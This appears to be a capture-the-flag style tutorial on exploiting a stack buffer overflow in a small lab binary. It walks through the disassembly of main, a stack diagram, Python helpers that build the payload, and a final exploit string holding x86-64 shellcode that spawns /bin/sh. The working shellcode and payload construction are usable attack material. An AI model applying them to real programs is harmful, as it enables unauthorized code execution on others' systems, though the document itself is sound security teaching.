vuln
executable. We assume ASLR is disabled and the stack is executable.
Download vuln
here.
Just as with any other binary exploitation problem, I suggest running the program with different inputs just to get a feel for what the program is doing.
After running vuln
a couple of times, we might realize that the program doesn't output anything useful about the expected usage, so we can move on at this point.
We start by running objdump -d vuln > vuln.asm, which dumps the program's disassembly into the vuln.asm file.
Now we open vuln.asm
to take a look at the main
function, which we can find at address 0x4005ed
. I'll copy the contents below:
00000000004005ed <main>:
  4005ed: 55                      push   %rbp
  4005ee: 48 89 e5                mov    %rsp,%rbp
  4005f1: 48 83 ec 50             sub    $0x50,%rsp
  4005f5: 89 7d bc                mov    %edi,-0x44(%rbp)
  4005f8: 48 89 75 b0             mov    %rsi,-0x50(%rbp)
  4005fc: 48 8b 45 b0             mov    -0x50(%rbp),%rax
  400600: 48 83 c0 08             add    $0x8,%rax
  400604: 48 8b 00                mov    (%rax),%rax
  400607: 48 8d 4d c0             lea    -0x40(%rbp),%rcx
  40060b: 48 8d 55 f8             lea    -0x8(%rbp),%rdx
  40060f: be 10 07 40 00          mov    $0x400710,%esi
  400614: 48 89 c7                mov    %rax,%rdi
  400617: b8 00 00 00 00          mov    $0x0,%eax
  40061c: e8 cf fe ff ff          callq  4004f0 <__isoc99_sscanf@plt>
  400621: 89 45 fc                mov    %eax,-0x4(%rbp)
  400624: 83 7d fc 02             cmpl   $0x2,-0x4(%rbp)
  400628: 74 1b                   je     400645 <main+0x58>
  40062a: 8b 45 fc                mov    -0x4(%rbp),%eax
  40062d: 89 c6                   mov    %eax,%esi
  40062f: bf 16 07 40 00          mov    $0x400716,%edi
  400634: b8 00 00 00 00          mov    $0x0,%eax
  400639: e8 82 fe ff ff          callq  4004c0 <printf@plt>
  40063e: b8 ff ff ff ff          mov    $0xffffffff,%eax
  400643: eb 2f                   jmp    400674 <main+0x87>
  400645: eb 14                   jmp    40065b <main+0x6e>
  400647: 8b 45 f8                mov    -0x8(%rbp),%eax
  40064a: 89 c6                   mov    %eax,%esi
  40064c: bf 30 07 40 00          mov    $0x400730,%edi
  400651: b8 00 00 00 00          mov    $0x0,%eax
  400656: e8 65 fe ff ff          callq  4004c0 <printf@plt>
  40065b: 8b 45 f8                mov    -0x8(%rbp),%eax
  40065e: 3d 94 3a 8f 49          cmp    $0x498f3a94,%eax
  400663: 75 e2                   jne    400647 <main+0x5a>
  400665: bf 54 07 40 00          mov    $0x400754,%edi
  40066a: e8 41 fe ff ff          callq  4004b0 <puts@plt>
  40066f: b8 00 00 00 00          mov    $0x0,%eax
  400674: c9                      leaveq
  400675: c3                      retq
sscanf
and printf
.
Recall that the first argument to a function is stored in the rdi
/edi
register.
We can quickly see that right before the calls to printf
, a constant value (string) is being stored into rdi
.
Since the constant string is unlikely to be user controlled, we can guess that this is not supposed to be a format string attack exploiting printf
.
Since printf appears to be uninteresting to us, let's take a look at sscanf
. Before our call to sscanf
, we have a lot of stack manipulation, so this would be a good time to create a stack diagram.
====================    stack grows down
main return addr
-------------------- <- rbp + 0x8
saved rbp
-------------------- <- rbp - 0x0
sscanf return val
-------------------- <- rbp - 0x4
integer variable
-------------------- <- rbp - 0x8
string buffer
-------------------- <- rbp - 0x40
argc
-------------------- <- rbp - 0x44
argv
==================== <- rbp - 0x50
rip
is at 0x40061c
(right about to call sscanf
), rdi
contains argv[1]
, rsi
contains some constant string at 0x400710
, rdx
contains some 4-byte variable at rbp - 0x8
, and rcx
contains the pointer to a buffer at rbp - 0x40
.
0x40061c
. When we hit the breakpoint, we can print the string at 0x400710
. Turns out this string is just "%d,%s".
So, the corresponding line of C will look something like this:
int sscanf_return_value = sscanf(argv[1], "%d,%s", &integer_variable, buffer);
Continuing with the assembly, we see that the program compares the return value of
sscanf
with 2. If the return value isn't 2, it will print the return value of sscanf
and exit main
.
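To get a feel for which return values to expect, here is a rough Python 3 model of that sscanf call. It is only a sketch: model_sscanf is a made-up helper name, and it ignores edge cases such as empty input, where the real sscanf returns EOF instead of 0.

```python
import re

def model_sscanf(arg: bytes):
    """Rough model of sscanf(arg, "%d,%s", &n, buf).

    Returns (count, n, s), where count is the number of conversions
    that succeeded, like the return value of the real sscanf.
    """
    # %d: skip leading whitespace, then read an optionally signed decimal.
    m = re.match(rb"\s*([+-]?\d+)", arg)
    if not m:
        return 0, None, None
    n = int(m.group(1))
    rest = arg[m.end():]
    # The literal ',' in the format string must match exactly.
    if not rest.startswith(b","):
        return 1, n, None
    # %s: skip leading whitespace, then read up to the next whitespace byte.
    m2 = re.match(rb"\s*(\S+)", rest[1:])
    if not m2:
        return 1, n, None
    return 2, n, m2.group(1)

print(model_sscanf(b"5,AAAA"))   # (2, 5, b'AAAA')
print(model_sscanf(b"hello"))    # (0, None, None)
print(model_sscanf(b"5,AA BB"))  # (2, 5, b'AA')
```

The last call is worth keeping in mind: %s stops at the first whitespace byte, so anything we want copied into the buffer must not contain whitespace.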
integer_variable
is equal to 0x498f3a94
, which happens to be 1234123412
in decimal. If it is not equal, it enters an infinite while loop. Otherwise, the program prints something, returns from main
, and exits normally.
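If you want to double check the conversion, and see how the value is laid out in memory on a little-endian machine like x86-64, a quick Python 3 sketch does the job (the name MAGIC is just my label for the constant):

```python
import struct

MAGIC = 0x498F3A94

# The constant from the cmp instruction, in decimal.
print(MAGIC)  # 1234123412

# x86-64 is little-endian, so the least significant byte comes first in memory.
magic_bytes = struct.pack("<I", MAGIC)
print(magic_bytes.hex())  # 943a8f49
```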
sscanf
is copying from (user-controlled) argv[1]
into a fixed-size buffer. Classic buffer overflow!
main
return address with the address of our buffer.
("5,") + (0x38 bytes of shellcode) + (1234123412) + (0xC bytes of padding) + (address of buffer)
You might ask yourself why we start with the number
5
instead of 1234123412
. The answer is that sscanf writes into the supplied arguments from left to right. If we overflow the string buffer enough, then we will end up overwriting the integer variable at rbp - 0x8
anyway. As a result, it doesn't matter what we put as the first number, as long as it is a decimal number. What matters is that we put 1234123412
into our string at the right location.
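Here is a small Python 3 sketch of that ordering argument. It models the stack frame from the start of the buffer (rbp - 0x40) up to the end of the return address as a plain bytearray, stores the %d result first, and then copies the %s result over it. The names simulate, FRAME and INT_OFF are made up for illustration, and the offsets are taken from the stack diagram above.

```python
import struct

FRAME = 0x50    # bytes from rbp - 0x40 up to the end of the return address
INT_OFF = 0x38  # the integer variable (rbp - 0x8) relative to the buffer start
MAGIC = 1234123412

def simulate(first_number: int, string: bytes) -> int:
    """Return the integer variable's value after both conversions are stored."""
    frame = bytearray(FRAME)
    # %d is stored first...
    frame[INT_OFF:INT_OFF + 4] = struct.pack("<i", first_number)
    # ...then %s copies the string plus a terminating NUL, with no bounds check.
    data = string + b"\x00"
    frame[0:len(data)] = data
    return struct.unpack_from("<I", frame, INT_OFF)[0]

overflow = b"\x90" * INT_OFF + struct.pack("<I", MAGIC) + b"A" * 0xC

print(simulate(5, b"hi"))      # 5
print(simulate(5, overflow))   # 1234123412
print(simulate(42, overflow))  # 1234123412
```

A short string leaves the 5 alone, while the overflowing string replaces it no matter what the first number was.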
\x90
s).
sscanf
is called, the rcx
register contains the address of the buffer. We can use gdb to retrieve this address (break on sscanf
, use p/x $rcx
), which on my machine is 0x7fffffffdd50
. This address will be different outside of gdb, but we can continue to test in gdb anyway and adjust this address later.
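Putting the pieces together by hand is error-prone, so here is a minimal Python 3 sketch that assembles the string from the layout above. The function name build_payload and the constants are my own, the 8 bytes of \xcc are only a placeholder standing in for real shellcode, and the address is the one from my gdb session, so treat all of them as assumptions.

```python
import struct

BUF_TO_INT = 0x38   # distance from the buffer (rbp - 0x40) to the integer (rbp - 0x8)
PAD_LEN = 0xC       # sscanf return value (4 bytes) + saved rbp (8 bytes)
MAGIC = 1234123412

def build_payload(shellcode: bytes, buffer_addr: int) -> bytes:
    if len(shellcode) > BUF_TO_INT:
        raise ValueError("shellcode does not fit before the integer variable")
    # NOPs fill whatever the shellcode leaves free at the front of the buffer.
    sled = b"\x90" * (BUF_TO_INT - len(shellcode))
    # argv cannot carry NUL bytes, so drop the two zero high bytes of the
    # address; the matching bytes of the old return address are already zero.
    addr = struct.pack("<Q", buffer_addr).rstrip(b"\x00")
    return (b"5," + sled + shellcode + struct.pack("<I", MAGIC)
            + b"A" * PAD_LEN + addr)

placeholder = b"\xcc" * 8  # hypothetical stand-in, not working shellcode
payload = build_payload(placeholder, 0x7FFFFFFFDD50)
print(len(payload))  # 80
```

Note that this produces bytes, whereas the python -c one-liner in this article relies on Python 2 string semantics.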
gdb --args ./vuln $(python -c "print '5,' + '\x90' * 0x1D + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + '\x94\x3a\x8f\x49' + 'A' * 12 + '\x50\xdd\xff\xff\xff\x7f'")
When we run this it should work! But...
rip
is at 0x7fffffffdd81
. This is clearly within our buffer, and we can step through the code in assembly to confirm that we got past all the NOPs. The program executes normally until 0x7fffffffdd81
, which is odd.
x/30dx $rip
in gdb) right before we get to the offending address, we see that 0x7fffffffdd81
is opcode 5e, which corresponds to pop rsi
. This is clearly not an illegal instruction, since gdb is able to interpret the opcode. However, once we get to 0x7fffffffdd81
, gdb now interprets the opcode as (bad)
.
rsp
, which is 0x7fffffffdd90
. Additionally, the instruction right before the pop rsi
is push rsp
. The push instruction ends up modifying the next instruction to be executed, and it's clear that rsp
is simply very unluckily placed.
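We can sanity check this explanation without gdb by tracking where each push lands. The Python 3 sketch below works in offsets relative to the start of the buffer, using the stack diagram and the first exploit string (0x1D NOPs followed by 27 bytes of shellcode). The helper names are made up, and the exact addresses on a given machine may differ from these offsets.

```python
# All offsets are relative to the start of the string buffer (rbp - 0x40).
RET_ADDR_OFF = 0x48   # main's return address sits at rbp + 0x8
NOPS = 0x1D
SHELLCODE_LEN = 27

# Stack operations of the shellcode in execution order:
# push rbx, push rsp, pop rdi, push rdx, push rdi, push rsp, pop rsi
OPS = ["push", "push", "pop", "push", "push", "push", "pop"]

def stack_writes(ops, rsp):
    """Return the [start, end) offset range written by each push."""
    writes = []
    for op in ops:
        if op == "push":
            rsp -= 8                    # push moves rsp down, then stores 8 bytes
            writes.append((rsp, rsp + 8))
        else:
            rsp += 8                    # pop only reads, then moves rsp up
    return writes

def clobbered(writes, lo, hi):
    """Keep only the writes that overlap the range [lo, hi)."""
    return [w for w in writes if w[0] < hi and w[1] > lo]

rsp_after_ret = RET_ADDR_OFF + 8        # ret pops the 8-byte return address
code = (NOPS, NOPS + SHELLCODE_LEN)     # where the shellcode bytes live
hits = clobbered(stack_writes(OPS, rsp_after_ret), *code)
print([(hex(a), hex(b)) for a, b in hits])  # [('0x30', '0x38')]
```

The last push writes 8 bytes over the tail of the shellcode, which in this model is exactly where the pop rsi and the instructions after it live.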
shellcode.asm
. Then at the start of the program, we can add sub rsp, 100
to move rsp
. Our shellcode assembly now looks like this:
; shellcode.asm
main:
    sub rsp, 100
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall
We compile this:
nasm -felf64 shellcode.asm
and then we retrieve the opcodes using objdump: objdump -d shellcode.o
. Our new shellcode ends up being this:
\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05
This is 4 bytes longer than the original shellcode, so we compensate for that by shortening our NOP slide by 4 bytes. Now this is our final exploit string:
gdb --args ./vuln $(python -c "print '5,' + '\x90' * 0x19 + '\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + '\x94\x3a\x8f\x49' + 'A' * 12 + '\x50\xdd\xff\xff\xff\x7f'")
Sure enough, it spawns a shell in gdb.
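Before moving on, a few properties of the final shellcode are worth checking, since the string travels through argv and %s: it must fit in front of the integer variable, and it must not contain NUL or whitespace bytes. The Python 3 sketch below checks that, and also decodes the constant that gets negated, which is presumably written that way to keep a literal NUL byte out of the shellcode. The names SHELLCODE, BAD and bad_bytes are mine.

```python
import struct

SHELLCODE = (b"\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff"
             b"\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")

# NUL cannot appear inside an argv string, and %s stops at whitespace.
BAD = b"\x00\t\n\v\f\r "

def bad_bytes(data: bytes):
    """Return the sorted byte values in data that would break the exploit."""
    return sorted(set(data) & set(BAD))

print(len(SHELLCODE))               # 31
print(hex(0x38 - len(SHELLCODE)))   # 0x19, the NOP count in the final string
print(bad_bytes(SHELLCODE))         # []

# mov rbx, 0xFF978CD091969DD1 followed by neg rbx leaves this in rbx:
imm = 0xFF978CD091969DD1
negated = (-imm) & 0xFFFFFFFFFFFFFFFF
print(struct.pack("<Q", negated))   # b'/bin/sh\x00'
```

So the value pushed onto the stack is the NUL-terminated path "/bin/sh", and 0x3b in al is the execve syscall number on x86-64 Linux.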
0x7fffffffdd50
and run it until we get a shell. And that's it!